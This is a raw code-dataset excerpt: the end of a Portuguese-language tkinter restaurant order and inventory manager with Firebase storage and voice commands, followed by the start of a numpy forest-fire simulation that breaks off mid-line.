self.bdespesas.destroy()\r\n self.tabela.destroy()\r\n self.imagemslogosalao.destroy()\r\n self.verde1f.destroy()\r\n \r\n \r\n \r\n \r\n except AttributeError:\r\n pass\r\n \r\n try:\r\n self.adm.configure(bg = \"peru\", fg = \"black\")\r\n self.bfuncionarios.destroy()\r\n self.bdespesas.destroy()\r\n self.blicensas.destroy()\r\n self.blogins.destroy()\r\n self.tablepromocoes.destroy()\r\n self.badicionarpromocao.destroy()\r\n self.beditarpromocao.destroy()\r\n self.bremoverpromocao.destroy()\r\n self.fundofinancas.destroy()\r\n self.tfaturamento.destroy()\r\n self.tbruta.destroy()\r\n self.tdespesas.destroy()\r\n self.tfuncionarios.destroy()\r\n self.tpedidos.destroy()\r\n self.totalmesas.destroy()\r\n self.treservas.destroy()\r\n self.gerenciamento.destroy()\r\n self.financas.destroy()\r\n self.promocoes.destroy()\r\n self.canvasmetas.destroy()\r\n self.metas.destroy()\r\n self.tablemetas.destroy()\r\n self.baddmetas.destroy()\r\n self.beditarmetas.destroy()\r\n self.bremovermetas.destroy()\r\n except:\r\n pass\r\n \r\n \r\n self.voicecommand5 = tk.Button(self.mainwindow, bg = \"cyan\" , image = self.imagemmic1, command = self.voicebutton5, height= 50, width = 50)\r\n self.voicecommand5.image = self.imagemmic1\r\n self.voicecommand5.place(x = 1465, y = 795)\r\n \r\n self.InventoryTitle = tk.Label(self.mainwindow, text = \"Estoque:\", bg = \"sandy brown\", font = ('verdana', 20))\r\n self.InventoryTitle.place(x = 1165, y = 100)\r\n \r\n self.Inventory = ttk.Treeview(self.mainwindow, columns = (\"Produto\", \"Quantidade\", \"Data de Reposição\"))\r\n self.Inventory.configure(height = 0)\r\n self.Inventory.heading('#0', text = 'ID')\r\n self.Inventory.heading('#1', text = 'Produto')\r\n self.Inventory.heading('#2', text = 'Quantidade')\r\n self.Inventory.heading('#3', text = 'Data de Reposição')\r\n self.Inventory.column('#0', anchor = 'center', width = 90)\r\n self.Inventory.column('#1', anchor = 'center', width = 120)\r\n self.Inventory.column('#2', anchor = 'center', width = 120)\r\n self.Inventory.column('#3', anchor = 'center', width = 120)\r\n self.Inventory.place(x = 1004, y = 150)\r\n self.Inventory.tag_configure(\"Cor\", background = \"bisque2\")\r\n \r\n self.InventoryEdit = tk.Button(self.mainwindow, text = \"Editar estoque\", bg = \"peru\", fg = \"black\", height = 2, width = 35, command = self.InventoryEditor)\r\n self.InventoryEdit.place(x = 1095, y = 700)\r\n \r\n self.InventoryAdd = tk.Button(self.mainwindow, text = 'Adicionar produto', bg = \"peru\", fg = \"black\", height = 2, width = 35, command = self.InventoryExpansion)\r\n self.InventoryAdd.place(x = 1095, y = 655)\r\n \r\n self.Reposition = tk.Button(self.mainwindow, text = 'Solicitar reposição', bg = 'peru', fg = \"black\", height = 2, width = 35, command = self.solicitarreposicao)\r\n self.Reposition.place(x = 1095, y = 745)\r\n \r\n self.OrdersTitle = tk.Label(self.mainwindow, text = \"Pedidos:\", bg = \"sandy brown\", font = ('verdana', 20))\r\n self.OrdersTitle.place(x = 290, y = 100)\r\n \r\n self.OrdersTable = ttk.Treeview(self.mainwindow, columns = (\"Mesa\", \"Pedido\", \"Preço Total\", \"Horario\"))\r\n self.OrdersTable.configure(height = 0)\r\n self.OrdersTable.heading('#0', text = 'ID')\r\n self.OrdersTable.heading('#1', text = 'Mesa')\r\n self.OrdersTable.heading('#2', text = 'Pedido(s)')\r\n self.OrdersTable.heading('#3', text = 'Valor Total')\r\n self.OrdersTable.heading('#4', text = 'Horário')\r\n self.OrdersTable.column('#0', anchor = 'center', width = 70)\r\n self.OrdersTable.column('#1', anchor = 'center', width = 70)\r\n self.OrdersTable.column('#2', anchor = 'center', width = 330)\r\n self.OrdersTable.column('#3', anchor = 'center', width = 95)\r\n self.OrdersTable.column('#4', anchor = 'center', width = 90)\r\n self.OrdersTable.place(x = 40, y = 150)\r\n self.OrdersTable.tag_configure(\"Cor\", background = \"bisque2\")\r\n \r\n self.PlaceOrder = tk.Button(self.mainwindow, text = \"Registrar pedido\", bg = \"peru\", fg = \"black\", height = 2, width = 35, command = self.MakeAnOrder)\r\n self.PlaceOrder.place(x = 238, y = 655)\r\n \r\n self.EditOrder = tk.Button(self.mainwindow, text = \"Editar pedido\", bg = \"peru\", fg = \"black\", height = 2, width = 35, command = self.EditAnOrder)\r\n self.EditOrder.place(x = 238, y = 700)\r\n \r\n self.RemoveOrder = tk.Button(self.mainwindow, text = \"Remover pedido\", bg = \"peru\", fg = \"black\", height = 2, width = 35, command = self.RemoveAnOrder)\r\n self.RemoveOrder.place(x = 238, y = 745)\r\n \r\n self.Foods = self.franquiaselecionada[\"Menu\"]\r\n self.FoodList = []\r\n for i in self.Foods:\r\n self.FoodList.append(i)\r\n \r\n \r\n \r\n try:\r\n for i in self.franquiaselecionada[\"Pedidos\"]:\r\n self.OrdersTable.insert(\"\", 1, \"\" , text = str(i), values = (self.franquiaselecionada[\"Pedidos\"][str(i)][\"Mesa\"], self.franquiaselecionada[\"Pedidos\"][str(i)][\"Pedido\"], self.franquiaselecionada[\"Pedidos\"][str(i)][\"Preco\"], self.franquiaselecionada[\"Pedidos\"][str(i)][\"Horario\"]), tags = (\"Cor\"))\r\n self.OrdersTable.configure(height = len(self.OrdersTable.get_children()))\r\n except:\r\n pass\r\n \r\n try:\r\n for i in self.franquiaselecionada[\"Estoque\"]:\r\n self.Inventory.insert(\"\", 1, \"\" , text = str(i), values = (self.franquiaselecionada[\"Estoque\"][str(i)][\"produto\"], self.franquiaselecionada[\"Estoque\"][str(i)][\"quantidade\"], self.franquiaselecionada[\"Estoque\"][str(i)][\"reposicao\"]), tags = (\"Cor\"))\r\n self.Inventory.configure(height = len(self.Inventory.get_children()))\r\n except:\r\n pass\r\n \r\n def voicebutton5(self):\r\n self.speak = wincl.Dispatch(\"SAPI.SpVoice\")\r\n self.r = sr.Recognizer()\r\n self.mic = sr.Microphone()\r\n\r\n\r\n with self.mic as source:\r\n self.audio = self.r.listen(source, phrase_time_limit = 2)\r\n \r\n if self.r.recognize_google(self.audio, language = \"pt-BR\") == \"registrar pedido\":\r\n try:\r\n self.MakeAnOrder()\r\n \r\n \r\n except:\r\n pass\r\n return\r\n \r\n elif self.r.recognize_google(self.audio, language = \"pt-BR\") == \"editar pedido\" :\r\n try:\r\n self.EditAnOrder()\r\n \r\n \r\n except:\r\n pass\r\n return\r\n \r\n elif self.r.recognize_google(self.audio, language = \"pt-BR\") == \"remover pedido\" :\r\n try:\r\n self.RemoveAnOrder()\r\n \r\n \r\n except:\r\n pass\r\n return\r\n \r\n \r\n elif self.r.recognize_google(self.audio, language = \"pt-BR\") == \"adicionar produto\":\r\n try:\r\n self.InventoryExpansion()\r\n except:\r\n pass\r\n return\r\n \r\n elif self.r.recognize_google(self.audio, language = \"pt-BR\") == \"editar estoque\":\r\n try:\r\n self.InventoryEditor()\r\n except:\r\n pass\r\n return\r\n \r\n elif self.r.recognize_google(self.audio, language = \"pt-BR\") == \"solicitar reposição\":\r\n try:\r\n self.solicitarreposicao()\r\n except:\r\n pass\r\n return\r\n \r\n else:\r\n \r\n self.speak.Speak(\"Desculpe, não entendi. Por favor, tente novamente!\")\r\n \r\n def solicitarreposicao(self):\r\n self.janelasolicitar = tk.Toplevel()\r\n self.janelasolicitar.wm_title(\"Solicitar reposição\")\r\n self.janelasolicitar.geometry(\"590x350\")\r\n self.janelasolicitar.configure(bg = \"sandy brown\")\r\n self.idsolicitar = tk.Label(self.janelasolicitar, text = \"ID: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.idsolicitarentry = tk.Entry(self.janelasolicitar, bg = \"peru\")\r\n self.bselecionarsolicitar = tk.Button(self.janelasolicitar, bg = \"peru\", fg = \"black\", font = (\"verdana\", 10), text = \"Selecionar ID\", command = self.solicitarselecionado, height= 2, width = 20)\r\n self.bselecionarsolicitar.place(x = 110, y = 100)\r\n self.idsolicitar.place(x = 50, y = 40)\r\n self.idsolicitarentry.place(x = 190, y = 40)\r\n \r\n def solicitarselecionado(self):\r\n self.franquiaselecionada[\"Estoque\"][str(self.idsolicitarentry.get())][\"reposicao\"] = \"SOLICITADA\"\r\n firebase.patch(self.selecionada, self.franquiaselecionada) \r\n try:\r\n self.Inventory.delete(*self.Inventory.get_children())\r\n for i in self.franquiaselecionada[\"Estoque\"]:\r\n self.Inventory.insert(\"\", 1, \"\" , text = str(i), values = (self.franquiaselecionada[\"Estoque\"][str(i)][\"produto\"], self.franquiaselecionada[\"Estoque\"][str(i)][\"quantidade\"], self.franquiaselecionada[\"Estoque\"][str(i)][\"reposicao\"]), tags = (\"Cor\"))\r\n self.Inventory.configure(height = len(self.Inventory.get_children()))\r\n except:\r\n pass\r\n \r\n \r\n self.janelasolicitar.destroy()\r\n \r\n def EditAnOrder(self):\r\n self.janelaeditarpedido = tk.Toplevel()\r\n self.janelaeditarpedido.wm_title(\"Editar Pedido\")\r\n self.janelaeditarpedido.geometry(\"590x350\")\r\n self.janelaeditarpedido.configure(bg = \"sandy brown\")\r\n self.idpedidoe = tk.Label(self.janelaeditarpedido, text = \"ID: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.idpedidoeentry = tk.Entry(self.janelaeditarpedido, bg = \"peru\")\r\n self.idpedidoe.place(x = 50, y = 40)\r\n self.idpedidoeentry.place(x = 190, y = 40)\r\n self.bselecionarpedidoe = tk.Button(self.janelaeditarpedido, bg = \"peru\", fg = \"black\", font = (\"verdana\", 10), text = \"Selecionar ID\", command = self.editarpedidoselecionado, height= 2, width = 20)\r\n self.bselecionarpedidoe.place(x = 110, y = 100)\r\n \r\n def editarpedidoselecionado(self):\r\n if self.idpedidoeentry.get() in self.franquiaselecionada[\"Pedidos\"]:\r\n self.idpedidoe.destroy()\r\n self.bselecionarpedidoe.destroy()\r\n self.idpedidoeentry.place_forget()\r\n self.numeromesaepe = tk.Label(self.janelaeditarpedido, text = \"Número da mesa: \", bg = \"sandy brown\", font = (\"verdana\",10))\r\n self.numeromesaentryepe = tk.Entry(self.janelaeditarpedido, bg = \"peru\")\r\n self.pedidoee = tk.Label(self.janelaeditarpedido, text = \"Pedido: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.FoodOrderOptionse = ttk.Combobox(self.janelaeditarpedido, values = self.FoodList, width = 17)\r\n self.FoodOrderOptionse.place(x=190,y=70)\r\n self.quantidadep = tk.Label(self.janelaeditarpedido, text = \"Quantidade:\", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.quantidadep.place(x = 330, y = 70)\r\n self.FoodQuantitye = tk.Entry(self.janelaeditarpedido, bg = \"peru\")\r\n self.FoodQuantitye.place(x=430,y=70)\r\n self.horariope = tk.Label(self.janelaeditarpedido, text = \"Horário: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.horarioentryepe = tk.Entry(self.janelaeditarpedido, bg = \"peru\")\r\n self.numeromesaepe.place(x = 50, y = 40)\r\n self.numeromesaentryepe.place(x = 190, y = 40)\r\n self.pedidoee.place(x = 50, y = 70)\r\n self.horariope.place(x = 50, y = 100)\r\n self.horarioentryepe.place(x = 190, y = 100)\r\n \r\n self.FoodOrderOptionse.set(self.franquiaselecionada[\"Pedidos\"][self.idpedidoeentry.get()][\"Pedido\"])\r\n self.FoodQuantitye.insert(0, self.franquiaselecionada[\"Pedidos\"][self.idpedidoeentry.get()][\"Quantidade\"])\r\n self.numeromesaentryepe.insert(0, self.franquiaselecionada[\"Pedidos\"][self.idpedidoeentry.get()][\"Mesa\"])\r\n self.horarioentryepe.insert(0, self.franquiaselecionada[\"Pedidos\"][self.idpedidoeentry.get()][\"Horario\"])\r\n self.binserirpedidoe = tk.Button(self.janelaeditarpedido, bg = \"peru\", fg = \"black\", font = (\"verdana\", 10), text = \"Adicionar\", command = self.inserirpedidoeditado, height= 2, width = 20)\r\n self.bcancelarinserirpedidoe = tk.Button(self.janelaeditarpedido, bg = \"peru\", fg = \"black\", font = (\"verdana\", 10), text = \"Cancelar\", command = self.cancelarinserirpedidoeditado, height= 2, width = 20)\r\n self.bcancelarinserirpedidoe.place(x=75, y= 250 )\r\n self.binserirpedidoe.place(x =290, y = 250)\r\n else:\r\n self.janelaeditarpedido.destroy()\r\n self.janelaerroedicao()\r\n \r\n def cancelarinserirpedidoeditado(self):\r\n self.janelaeditarpedido.destroy()\r\n def inserirpedidoeditado(self):\r\n self.franquiaselecionada[\"Pedidos\"][str(self.idpedidoeentry.get())] = {'Mesa': self.numeromesaentryepe.get(),'Pedido': self.FoodList[self.FoodOrderOptionse.current()], 'Preco': int(self.Foods[self.FoodList[self.FoodOrderOptionse.current()]])*int(self.FoodQuantitye.get()), 'Horario': self.horarioentryepe.get(), \"Quantidade\": self.FoodQuantitye.get()}\r\n firebase.patch(self.selecionada, self.franquiaselecionada) \r\n try:\r\n self.OrdersTable.delete(*self.OrdersTable.get_children())\r\n for i in self.franquiaselecionada[\"Pedidos\"]:\r\n self.OrdersTable.insert(\"\", 1, \"\" , text = str(i), values = (self.franquiaselecionada[\"Pedidos\"][str(i)][\"Mesa\"], self.franquiaselecionada[\"Pedidos\"][str(i)][\"Pedido\"], self.franquiaselecionada[\"Pedidos\"][str(i)][\"Preco\"], self.franquiaselecionada[\"Pedidos\"][str(i)][\"Horario\"]), tags = (\"Cor\"))\r\n self.OrdersTable.configure(height = len(self.OrdersTable.get_children()))\r\n except:\r\n pass\r\n \r\n self.janelaeditarpedido.destroy()\r\n \r\n def MakeAnOrder (self):\r\n self.OrderWindow = tk.Toplevel()\r\n self.OrderWindow.wm_title(\"Registrar Pedido\")\r\n self.OrderWindow.geometry(\"550x350\")\r\n self.OrderWindow.configure(bg = \"sandy brown\")\r\n\r\n self.TableNumber = tk.Label(self.OrderWindow, text = \"Mesa: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.TableNumberEntry = tk.Entry(self.OrderWindow, bg = \"peru\")\r\n \r\n self.OrderTime = tk.Label(self.OrderWindow, text = \"Horário: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.OrderTimeEntry = tk.Entry(self.OrderWindow, bg = \"peru\")\r\n \r\n self.TableNumber.place(x = 50, y = 70)\r\n self.TableNumberEntry.place(x = 130, y = 70)\r\n \r\n self.OrderTime.place(x = 50, y = 130)\r\n self.OrderTimeEntry.place(x = 130, y = 130)\r\n self.comida = tk.Label(self.OrderWindow, text = \"Pedido:\", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.comida.place(x = 50, y = 100)\r\n self.FoodOrderOptions = ttk.Combobox(self.OrderWindow, values = self.FoodList, width = 17)\r\n self.FoodOrderOptions.place(x=129,y=99)\r\n self.quantidade = tk.Label(self.OrderWindow, text = \"Quantidade:\", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.quantidade.place(x = 270, y = 100)\r\n self.FoodQuantity = tk.Entry(self.OrderWindow, bg = \"peru\")\r\n self.FoodQuantity.place(x=380,y=100)\r\n \r\n self.bCancelOrder = tk.Button(self.OrderWindow, bg = \"peru\", fg = \"black\", font = (\"verdana\", 10), text = \"Cancelar\", command = self.CancelOrder, height= 2, width = 20)\r\n self.bCancelOrder.place(x=75, y= 250)\r\n \r\n self.OrderConfirmation = tk.Button(self.OrderWindow, bg = \"peru\", fg = \"black\", font = (\"verdana\", 10), text = \"Confirmar Pedido\", command = self.ConfirmOrder, height= 2, width = 20)\r\n self.OrderConfirmation.place(x =290, y = 250)\r\n \r\n \r\n def ConfirmOrder(self): \r\n if len(self.OrdersTable.get_children()) < 22:\r\n self.OrdersTable.tag_configure(\"Cor\", background = \"bisque2\")\r\n self.franquiaselecionada[\"Dados\"][\"NPedidos\"] += 1\r\n self.numerop = self.franquiaselecionada[\"Dados\"][\"NPedidos\"]\r\n self.franquiaselecionada[\"Pedidos\"][str(self.numerop)] = {'Mesa': self.TableNumberEntry.get(),'Pedido': self.FoodList[self.FoodOrderOptions.current()], 'Preco': int(self.Foods[self.FoodList[self.FoodOrderOptions.current()]])*int(self.FoodQuantity.get()), 'Horario': self.OrderTimeEntry.get(), \"Quantidade\": self.FoodQuantity.get()}\r\n self.OrdersTable.insert(\"\", 1, \"\" , text = str(self.numerop), values = (self.franquiaselecionada[\"Pedidos\"][str(self.numerop)][\"Mesa\"], self.franquiaselecionada[\"Pedidos\"][str(self.numerop)][\"Pedido\"], self.franquiaselecionada[\"Pedidos\"][str(self.numerop)][\"Preco\"], self.franquiaselecionada[\"Pedidos\"][str(self.numerop)][\"Horario\"]), tags = (\"Cor\"))\r\n self.OrdersTable.configure(height = len(self.OrdersTable.get_children()))\r\n self.franquiaselecionada[\"Dados\"][\"NReceita\"] += int(self.Foods[self.FoodList[self.FoodOrderOptions.current()]])*int(self.FoodQuantity.get())\r\n firebase.patch(self.selecionada, self.franquiaselecionada)\r\n \r\n self.OrderWindow.destroy()\r\n else:\r\n self.OrderWindow.destroy()\r\n self.errotabela()\r\n \r\n def CancelOrder(self):\r\n self.OrderWindow.destroy()\r\n \r\n \r\n def CancelationOfRemoval(self):\r\n self.RemovedOrder.destroy()\r\n self.RemovedOrderEntry.destroy()\r\n self.OrderRemovalCancelation.destroy()\r\n self.OrderRemovalConfirmation.destroy()\r\n \r\n def RemovalConfirmation(self):\r\n del self.franquiaselecionada[\"Pedidos\"][self.nomepedidorentry.get()]\r\n firebase.patch(self.selecionada, self.franquiaselecionada)\r\n self.OrdersTable.delete(*self.OrdersTable.get_children())\r\n try:\r\n for i in self.franquiaselecionada[\"Estoque\"]:\r\n self.Inventory.insert(\"\", 1, \"\" , text = str(i), values = (self.franquiaselecionada[\"Estoque\"][str(i)][\"produto\"], self.franquiaselecionada[\"Estoque\"][str(i)][\"quantidade\"], self.franquiaselecionada[\"Estoque\"][str(i)][\"reposicao\"]), tags = (\"Cor\"))\r\n self.Inventory.configure(height = len(self.Inventory.get_children()))\r\n except:\r\n pass\r\n \r\n self.janelaeditarestoque.destroy()\r\n \r\n def RemoveAnOrder(self):\r\n self.janelarpedido = tk.Toplevel()\r\n self.janelarpedido.wm_title(\"Remover pedido\")\r\n self.janelarpedido.geometry(\"400x300\")\r\n self.janelarpedido.configure(bg = \"sandy brown\")\r\n self.nomepedidor = tk.Label(self.janelarpedido, text = \"ID: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.nomepedidorentry = tk.Entry(self.janelarpedido, bg = \"peru\")\r\n self.nomepedidor.place(x = 50, y = 40)\r\n self.nomepedidorentry.place(x = 190, y = 40)\r\n self.bremoverpedido = tk.Button(self.janelarpedido, bg = \"peru\", fg = \"black\", text = \"Remover pedido\", command = self.RemovalConfirmation, height= 2, width = 40)\r\n self.bremoverpedido.place(x = 55, y = 225)\r\n def NoFunctionLeft(self):\r\n None\r\n \r\n def InventoryEditor(self):\r\n self.janelaeditarestoque = tk.Toplevel()\r\n self.janelaeditarestoque.wm_title(\"Editar Estoque\")\r\n self.janelaeditarestoque.geometry(\"590x350\")\r\n self.janelaeditarestoque.configure(bg = \"sandy brown\")\r\n self.idestoquee = tk.Label(self.janelaeditarestoque, text = \"ID: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.idestoqueeentry = tk.Entry(self.janelaeditarestoque, bg = \"peru\")\r\n self.idestoquee.place(x = 50, y = 40)\r\n self.idestoqueeentry.place(x = 190, y = 40)\r\n self.bselecionarestoquee = tk.Button(self.janelaeditarestoque, bg = \"peru\", fg = \"black\", font = (\"verdana\", 10), text = \"Selecionar ID\", command = self.editarestoqueselecionado, height= 2, width = 20)\r\n self.bselecionarestoquee.place(x = 110, y = 100)\r\n \r\n \r\n def editarestoqueselecionado(self):\r\n if self.idestoqueeentry.get() in self.franquiaselecionada[\"Estoque\"]:\r\n self.idestoquee.destroy()\r\n self.bselecionarestoquee.destroy()\r\n self.idestoqueeentry.place_forget()\r\n self.produtoe = tk.Label(self.janelaeditarestoque, text = \"Produto: \", bg = \"sandy brown\", font = (\"verdana\",10))\r\n self.produtoeentry = tk.Entry(self.janelaeditarestoque, bg = \"peru\")\r\n self.quantidadeestoque = tk.Label(self.janelaeditarestoque, text = \"Quantidade: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.quantidadeestoqueentry = tk.Entry(self.janelaeditarestoque, bg = \"peru\")\r\n self.reposicaoestoque = tk.Label(self.janelaeditarestoque, text = \"Data de Reposição: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.reposicaoestoqueentry = tk.Entry(self.janelaeditarestoque, bg = \"peru\")\r\n self.produtoe.place(x = 50, y = 40)\r\n self.produtoeentry.place(x = 190, y = 40)\r\n self.quantidadeestoque.place(x = 50, y = 70)\r\n self.quantidadeestoqueentry.place(x = 190, y = 70)\r\n self.reposicaoestoque.place(x = 50, y = 100)\r\n self.reposicaoestoqueentry.place(x = 190, y = 100)\r\n \r\n self.produtoeentry.insert(0, self.franquiaselecionada[\"Estoque\"][self.idestoqueeentry.get()][\"produto\"])\r\n self.quantidadeestoqueentry.insert(0, self.franquiaselecionada[\"Estoque\"][self.idestoqueeentry.get()][\"quantidade\"])\r\n self.reposicaoestoqueentry.insert(0, self.franquiaselecionada[\"Estoque\"][self.idestoqueeentry.get()][\"reposicao\"])\r\n self.binserirestoquee = tk.Button(self.janelaeditarestoque, bg = \"peru\", fg = \"black\", font = (\"verdana\", 10), text = \"Adicionar\", command = self.inserirestoqueeditado, height= 2, width = 20)\r\n self.bcancelarinserirestoquee = tk.Button(self.janelaeditarestoque, bg = \"peru\", fg = \"black\", font = (\"verdana\", 10), text = \"Cancelar\", command = self.cancelarinserirestoqueeditado, height= 2, width = 20)\r\n self.bcancelarinserirestoquee.place(x=75, y= 250 )\r\n self.binserirestoquee.place(x =290, y = 250)\r\n else:\r\n self.janelaeditarestoque.destroy()\r\n self.janelaerroedicao()\r\n \r\n \r\n def inserirestoqueeditado(self):\r\n self.franquiaselecionada[\"Estoque\"][str(self.idestoqueeentry.get())] = {'produto': self.produtoeentry.get(), 'quantidade': self.quantidadeestoqueentry.get(), 'reposicao': self.reposicaoestoqueentry.get()}\r\n firebase.patch(self.selecionada, self.franquiaselecionada) \r\n try:\r\n self.Inventory.delete(*self.Inventory.get_children())\r\n for i in self.franquiaselecionada[\"Estoque\"]:\r\n self.Inventory.insert(\"\", 1, \"\" , text = str(i), values = (self.franquiaselecionada[\"Estoque\"][str(i)][\"produto\"], self.franquiaselecionada[\"Estoque\"][str(i)][\"quantidade\"], self.franquiaselecionada[\"Estoque\"][str(i)][\"reposicao\"]), tags = (\"Cor\"))\r\n self.Inventory.configure(height = len(self.Inventory.get_children()))\r\n except:\r\n pass\r\n \r\n self.janelaeditarestoque.destroy()\r\n \r\n def cancelarinserirestoqueeditado(self):\r\n self.janelaeditarestoque.destroy()\r\n \r\n def InventoryExpansion(self):\r\n self.janelaaddinv = tk.Toplevel()\r\n self.janelaaddinv.wm_title(\"Adicionar Produto\")\r\n self.janelaaddinv.geometry(\"400x300\")\r\n self.janelaaddinv.configure(bg = \"sandy brown\")\r\n self.nomeinv = tk.Label(self.janelaaddinv, text = \"Produto: \" , bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.nomeinventry = tk.Entry(self.janelaaddinv, bg = \"peru\")\r\n self.quantidadeinv = tk.Label(self.janelaaddinv, text = \"Quantidade:\", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.datainv = tk.Label(self.janelaaddinv, text = \"Data de Reposição:\", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.quantidadeinventry = tk.Entry(self.janelaaddinv, bg = \"peru\")\r\n self.datainventry = tk.Entry(self.janelaaddinv, bg = \"peru\")\r\n self.nomeinv.place(x = 50, y = 40)\r\n self.nomeinventry.place(x = 210, y = 40)\r\n self.quantidadeinv.place(x = 50, y = 70)\r\n self.quantidadeinventry.place(x = 210, y = 70)\r\n self.datainv.place(x = 50, y = 100)\r\n self.datainventry.place(x = 210, y = 100)\r\n self.baddinv = tk.Button(self.janelaaddinv, bg = \"peru\", fg = \"black\", text = \"Adicionar\", command = self.adicionarinventario, height= 2, width = 40)\r\n self.baddinv.place(x = 55, y = 225)\r\n \r\n def adicionarinventario(self): \r\n if len(self.Inventory.get_children()) < 22:\r\n self.Inventory.tag_configure(\"Cor\", background = \"bisque2\")\r\n self.franquiaselecionada[\"Dados\"][\"NEstoque\"] += 1\r\n self.numeroe = self.franquiaselecionada[\"Dados\"][\"NEstoque\"]\r\n self.franquiaselecionada[\"Estoque\"][str(self.numeroe)] = {'produto': self.nomeinventry.get(),'quantidade': self.quantidadeinventry.get(), 'reposicao': self.datainventry.get()}\r\n self.Inventory.insert(\"\", 1, \"\" , text = str(self.numeroe), values = (self.franquiaselecionada[\"Estoque\"][str(self.numeroe)][\"produto\"], self.franquiaselecionada[\"Estoque\"][str(self.numeroe)][\"quantidade\"], self.franquiaselecionada[\"Estoque\"][str(self.numeroe)][\"reposicao\"]), tags = (\"Cor\"))\r\n self.Inventory.configure(height = len(self.Inventory.get_children()))\r\n firebase.patch(self.selecionada, self.franquiaselecionada)\r\n \r\n self.janelaaddinv.destroy()\r\n else:\r\n self.janelaaddinv.destroy()\r\n self.errotabela()\r\n \r\n \r\nfd = FoodTools()\r\nfd.comeco()\r\n\r\n \r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":171491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"460553207","text":"import matplotlib as mpl\nimport matplotlib.pyplot as plt\nmpl.interactive(True)\nimport numpy as np\nimport scipy.ndimage\n\n### FUNCTIONS AND CONSTANTS #########\n\n\nEMPTY = 0\nTREE = 1\nFIRE = 2\nOLD_FIRE = 3\nPOTENTIAL_FIRE = 1\n\ndef change_random_cells(arr, n_cells, replace_value):\n \"\"\"\n Replace random cells in an array by a new value\n :param arr:\n :param n_cells:\n :param replace_value:\n :return:\n \"\"\"\n arr_copy = arr.ravel()\n indices = np.random.randint(0, len(arr_copy), n_cells).astype(\"int16\")\n arr_copy[indices] = replace_value\n return arr_copy.reshape(arr.shape)\n\nclass Landscape(object):\n \"\"\"\n A class that represents a landscape with a field and trees\n \"\"\"\n\n def __init__(self, field_size, tree_coverage, tree_growth_rate):\n \"\"\"\n Creates the initial landscape\n :param field_size: a tuple specifying the size of the landscape in numbers of rows and columns\n :param tree_coverage: a float indicating the density of trees\n \"\"\"\n\n self.size_row = field_size[0]\n self.size_col = field_size[1]\n self.n_cells = self.size_row * self.size_col\n self.tree_coverage = tree_coverage\n self.tree_growth_rate = tree_growth_rate\n\n self.field = self.create_field()\n self.plant_trees()\n\n def create_field(self):\n \"\"\"\n Create a numpy array that represents the field\n :return:\n \"\"\"\n field = np.zeros((self.size_row, self.size_col))\n return field\n\n def plant_trees(self):\n \"\"\"\n Plants trees on field based on tree_coverage\n :return:\n \"\"\"\n n_trees = int(self.tree_coverage * self.n_cells)\n self.field = change_random_cells(arr=self.field, n_cells=n_trees, replace_value=TREE)\n\n def set_fire(self, n_fires):\n \"\"\"\n Set randomly selected cells on fire\n :param n_fires: number of cells to be set on fire\n :return:\n \"\"\"\n self.field = change_random_cells(self.field, n_fires, FIRE)\n\n def plot_map(self):\n \"\"\"\n Return a pyplot of the current landscape\n :return:\n \"\"\"\n plt.imshow(self.field)\n\n def set_old_fire(self):\n \"\"\"\n Reclassify from fire to old fire\n :return:\n \"\"\"\n self.field[self.field == FIRE] = OLD_FIRE\n\n def fire_spreads2(self):\n field_ravel = self.field.ravel()\n potential_fires = np.zeros(field_ravel.shape)\n fire_indexes = np.where((field_ravel == OLD_FIRE))[0]\n potential_fire_indexes = np.concatenate([fire_indexes - self.size_col,\n fire_indexes - 1, fire_indexes,\n fire_indexes + 1, fire_indexes + self.size_row])\n\n potential_fire_indexes = potential_fire_indexes[(potential_fire_indexes < len(field_ravel)) &\n (potential_fire_indexes >= 0)]\n # print(len(potential_fire_indexes))\n potential_fires[potential_fire_indexes] = POTENTIAL_FIRE\n potential_fires = potential_fires.reshape(self.field.shape)\n\n self.field = np.where((self.field == TREE) & (potential_fires == POTENTIAL_FIRE), FIRE, self.field)\n\n def fire_spreads(self):\n fires = np.where(self.field == OLD_FIRE, 1, 0).astype(\"bool\")\n struct = scipy.ndimage.generate_binary_structure(2, 1)\n potential_fires = scipy.ndimage.binary_dilation(fires, structure=struct).astype(fires.dtype)\n self.field = np.where((self.field == TREE) & (potential_fires == 1), FIRE, self.field)\n\n def fire_stops(self):\n \"\"\"\n Stops fire in cells\n :return:\n \"\"\"\n # print(len(self.field[self.field == FIRE]))\n self.field[self.field == OLD_FIRE] = EMPTY\n\n def trees_grow(self):\n \"\"\"\n Let's trees grow back\n :return:\n \"\"\"\n field_ravel = self.field.ravel()\n empty_indexes = np.where(field_ravel == EMPTY)[0]\n n_new_trees = int(self.tree_growth_rate * len(empty_indexes))\n new_tree_indexes = np.random.choice(empty_indexes, n_new_trees)\n field_ravel[new_tree_indexes] = TREE\n self.field = field_ravel.reshape(self.field.shape)\n\n##### MAIN PROGRAM #######\n\ndef main():\n field_size = (100, 100)\n tree_coverage = 0.6\n n_initial_fires = 5\n n_iterations = 1000\n tree_growth_rate = 0.01\n\n landscape = Landscape(field_size, tree_coverage, tree_growth_rate)\n #landscape.plot_map()\n\n landscape.set_fire(n_initial_fires)\n #landscape.plot_map()\n\n maps = []\n maps.append(landscape.field)\n for timestep in range(0, n_iterations):\n landscape.set_old_fire()\n landscape.fire_spreads()\n landscape.trees_grow()\n landscape.fire_stops()\n #print(landscape.field.max())\n maps.append(landscape.field)\n #\n # # First set up the figure, the axis, and the plot element we want to animate\n # fig = plt.figure(figsize=(10, 10))\n # ax = plt.axes(xlim=(0, 